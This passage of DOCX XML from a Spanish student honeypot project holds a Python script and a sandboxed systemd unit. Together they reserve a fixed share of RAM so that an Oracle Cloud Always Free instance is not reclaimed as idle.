        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">oci-keepalive.py - Evita que Oracle recupere la instancia por "ociosa"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Proyecto Intermodular ASIR - Diego Perez Fonterosa</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Oracle puede recuperar una instancia Always Free si durante 7 dias tiene</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">a la vez CPU &lt; 20 % (p95), red &lt; 20 % y, en las A1, memoria &lt; 20 %.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Un honeypot cumple las tres. Basta con romper una: este proceso reserva</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">un porcentaje fijo de la RAM y la mantiene ocupada, sin gastar CPU.</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Porcentaje configurable con la variable KEEPALIVE_PERCENT (defecto 25).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import os</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import signal</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import sys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import time</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def meminfo(campo):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    with open("/proc/meminfo", encoding="ascii") as f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        for linea in f:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            if linea.startswith(campo + ":"):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                return int(linea.split()[1]) * 1024  # kB -&gt; bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    raise KeyError(campo)</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def main():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    pct = float(os.environ.get("KEEPALIVE_PERCENT", "25"))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if not 0 &lt; pct &lt;= 50:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        sys.exit("KEEPALIVE_PERCENT debe estar entre 0 y 50")</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total = meminfo("MemTotal")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    tam = int(total * pct / 100)</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 bytearray() pide paginas a cero que el kernel no asigna hasta que se</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    # escriben: hay que tocar cada pagina para que cuenten como RAM usada.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    buf = bytearray(tam)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    pagina = os.sysconf("SC_PAGE_SIZE")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    for i in range(0, tam, pagina):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        buf[i] = 1</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print(f"Reservados {tam / 2**20:.0f} MiB ({pct:g} % de {total / 2**30:.1f} GiB)", flush=True)</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signal.signal(signal.SIGTERM, lambda *_: sys.exit(0))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    while True:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        time.sleep(3600)</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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">oci-keepalive.service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="12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/etc/systemd/system/oci-keepalive.service (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  Reserva el 25 % de la RAM para que Oracle no considere ociosa la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">#  instancia A1 (politica de recuperacion de instancias Always Free).</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[Unit]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Description=Reserva de memoria anti-recuperacion de instancias ociosas OCI (PFC-Cowrie)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">After=multi-user.target</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[Service]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Type=simple</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment=KEEPALIVE_PERCENT=25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ExecStart=/usr/bin/python3 /usr/local/lib/pfc-cowrie/oci-keepalive.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Restart=always</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">RestartSec=30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Nice=19</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La reserva tiene que estar en RAM: si se fuese a swap no contaria.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">MemorySwapMax=0</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Confinamiento: usuario efimero sin privilegios ni acceso a ficheros</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">DynamicUser=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">NoNewPrivileges=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectSystem=strict</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">ProtectHome=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivateTmp=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivateDevices=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">PrivateNetwork=yes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">CapabilityBoundingSet=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">RestrictAddressFamilies=AF_UNIX</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[Install]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:shd w:fill="F2F2F2" w:color="F2F2F2" w:val="solid"/>
        <w:spacing w:after="200" w:before="0" w:line="240"/>
        <w:ind w:left="170" w:right="170"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">WantedBy=multi-user.target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
